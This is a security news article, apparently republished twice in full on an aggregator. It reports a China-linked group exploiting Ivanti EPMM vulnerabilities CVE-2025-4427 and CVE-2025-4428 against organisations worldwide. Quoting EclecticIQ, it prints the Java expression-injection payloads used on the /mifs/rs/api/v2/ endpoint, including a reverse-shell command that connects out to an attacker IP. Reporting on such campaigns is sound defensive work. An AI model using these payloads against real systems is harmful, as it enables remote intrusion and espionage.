Chinese Nexus Hackers Actively Exploiting Ivanti Endpoint Manager Mobile Vulnerability
- С сайта: Vulnerability(cybersecuritynews.com)
- Вернуться к списку новостей
С сайта: Vulnerability(cybersecuritynews.com)
A sophisticated China-linked threat group has been actively exploiting critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM) systems since May 15, 2025, targeting organizations across healthcare, telecommunications, aviation, municipal government, finance, and defense sectors globally.
The campaign leverages two newly disclosed vulnerabilities, CVE-2025-4427 and CVE-2025-4428, which can be chained together to achieve unauthenticated remote code execution on exposed systems.
The exploitation campaign has demonstrated remarkable breadth, with confirmed victims spanning Europe, North America, and the Asia-Pacific region.
Affected organizations include municipal governance agencies in Scandinavian capitals, UK healthcare trusts, German telecommunications providers, U.S. medical device manufacturers, and Japanese automotive suppliers.
The attackers have shown particular interest in organizations managing large fleets of mobile devices, capitalizing on EPMM’s central role in enterprise mobile device management to potentially compromise thousands of managed endpoints across targeted networks.
EclecticIQ analysts identified the threat activity and attributed it with high confidence to UNC5221, a China-nexus espionage group previously linked to zero-day exploitation campaigns targeting edge network appliances since at least 2023.
.webp)
Ivanti EPMM intrusions (Source – EclecticIQ)
The group demonstrates sophisticated understanding of EPMM’s internal architecture, repurposing legitimate system components for covert data exfiltration operations that include personally identifiable information, authentication credentials, and sensitive organizational data.
The attackers have deployed advanced malware including KrustyLoader, which retrieves encrypted Sliver backdoor payloads from compromised Amazon AWS S3 buckets, and utilized Fast Reverse Proxy (FRP) tools to establish persistent network access for reconnaissance and lateral movement.
The campaign’s technical sophistication and targeting patterns align with state-sponsored cyber espionage objectives, raising significant concerns about the potential for long-term intelligence collection and network compromise.
Initial Compromise Mechanism and Exploitation Techniques
The threat actors achieve initial system access by exploiting an unauthenticated remote code execution vulnerability targeting the /mifs/rs/api/v2/ endpoint, where malicious commands are injected through the format= parameter.
The exploitation leverages Java-based server-side injection techniques, embedding complex payloads within HTTP GET requests that abuse Java reflection capabilities to execute arbitrary system commands.
.webp)
Base64-encoded payload embedded in a GET request (Source – EclecticIQ)
The attackers utilize sophisticated Java reflection syntax to invoke Runtime.getRuntime().exec() for command execution, as demonstrated in the following payload structure: ${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec(COMMAND").waitFor()}.
This technique ensures the Java thread remains active until external processes complete, maintaining communication channels between attackers and compromised systems.
.webp)
Decryption process revealing malicious URL (Source – EclecticIQ)
EclecticIQ researchers documented specific examples of reverse shell establishment, where attackers execute commands such as ${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/64.52.80.21/4444 0>&1"}).waitFor()} to create interactive command-line access to victim systems.
Additionally, the threat actors employ complementary Java expressions using Scanner objects to capture command output: ${"".getClass().forName("java.util.Scanner").getConstructor("".getClass().forName("java.lang.Process").getMethod("exec", COMMAND").getInputStream()).useDelimiter("\\A").next()}.
This dual-technique approach enables attackers to both execute malicious commands and immediately retrieve their results, effectively establishing reliable command-and-control mechanisms through server-side Java injection vulnerabilities.
The sophistication of these exploitation methods demonstrates the threat group’s deep technical expertise and their ability to rapidly weaponize newly disclosed vulnerabilities for large-scale espionage operations.
#Cyber_Security_News #Vulnerability #cyber_security_news #vulnerability
Оригинальная версия на сайте:
Chinese Nexus Hackers Actively Exploiting Ivanti Endpoint Manager Mobile Vulnerability
Author: Tushar Subhra DuttaA sophisticated China-linked threat group has been actively exploiting critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM) systems since May 15, 2025, targeting organizations across healthcare, telecommunications, aviation, municipal government, finance, and defense sectors globally.
The campaign leverages two newly disclosed vulnerabilities, CVE-2025-4427 and CVE-2025-4428, which can be chained together to achieve unauthenticated remote code execution on exposed systems.
The exploitation campaign has demonstrated remarkable breadth, with confirmed victims spanning Europe, North America, and the Asia-Pacific region.
Affected organizations include municipal governance agencies in Scandinavian capitals, UK healthcare trusts, German telecommunications providers, U.S. medical device manufacturers, and Japanese automotive suppliers.
The attackers have shown particular interest in organizations managing large fleets of mobile devices, capitalizing on EPMM’s central role in enterprise mobile device management to potentially compromise thousands of managed endpoints across targeted networks.
EclecticIQ analysts identified the threat activity and attributed it with high confidence to UNC5221, a China-nexus espionage group previously linked to zero-day exploitation campaigns targeting edge network appliances since at least 2023.
Ivanti EPMM intrusions (Source – EclecticIQ)The group demonstrates sophisticated understanding of EPMM’s internal architecture, repurposing legitimate system components for covert data exfiltration operations that include personally identifiable information, authentication credentials, and sensitive organizational data.
The attackers have deployed advanced malware including KrustyLoader, which retrieves encrypted Sliver backdoor payloads from compromised Amazon AWS S3 buckets, and utilized Fast Reverse Proxy (FRP) tools to establish persistent network access for reconnaissance and lateral movement.
The campaign’s technical sophistication and targeting patterns align with state-sponsored cyber espionage objectives, raising significant concerns about the potential for long-term intelligence collection and network compromise.
Initial Compromise Mechanism and Exploitation Techniques
The threat actors achieve initial system access by exploiting an unauthenticated remote code execution vulnerability targeting the /mifs/rs/api/v2/ endpoint, where malicious commands are injected through the format= parameter.
The exploitation leverages Java-based server-side injection techniques, embedding complex payloads within HTTP GET requests that abuse Java reflection capabilities to execute arbitrary system commands.
Base64-encoded payload embedded in a GET request (Source – EclecticIQ)The attackers utilize sophisticated Java reflection syntax to invoke Runtime.getRuntime().exec() for command execution, as demonstrated in the following payload structure: ${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec(COMMAND").waitFor()}.
This technique ensures the Java thread remains active until external processes complete, maintaining communication channels between attackers and compromised systems.
Decryption process revealing malicious URL (Source – EclecticIQ)EclecticIQ researchers documented specific examples of reverse shell establishment, where attackers execute commands such as ${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/64.52.80.21/4444 0>&1"}).waitFor()} to create interactive command-line access to victim systems.
Additionally, the threat actors employ complementary Java expressions using Scanner objects to capture command output: ${"".getClass().forName("java.util.Scanner").getConstructor("".getClass().forName("java.lang.Process").getMethod("exec", COMMAND").getInputStream()).useDelimiter("\\A").next()}.
This dual-technique approach enables attackers to both execute malicious commands and immediately retrieve their results, effectively establishing reliable command-and-control mechanisms through server-side Java injection vulnerabilities.
The sophistication of these exploitation methods demonstrates the threat group’s deep technical expertise and their ability to rapidly weaponize newly disclosed vulnerabilities for large-scale espionage operations.
#Cyber_Security_News #Vulnerability #cyber_security_news #vulnerability
Оригинальная версия на сайте:
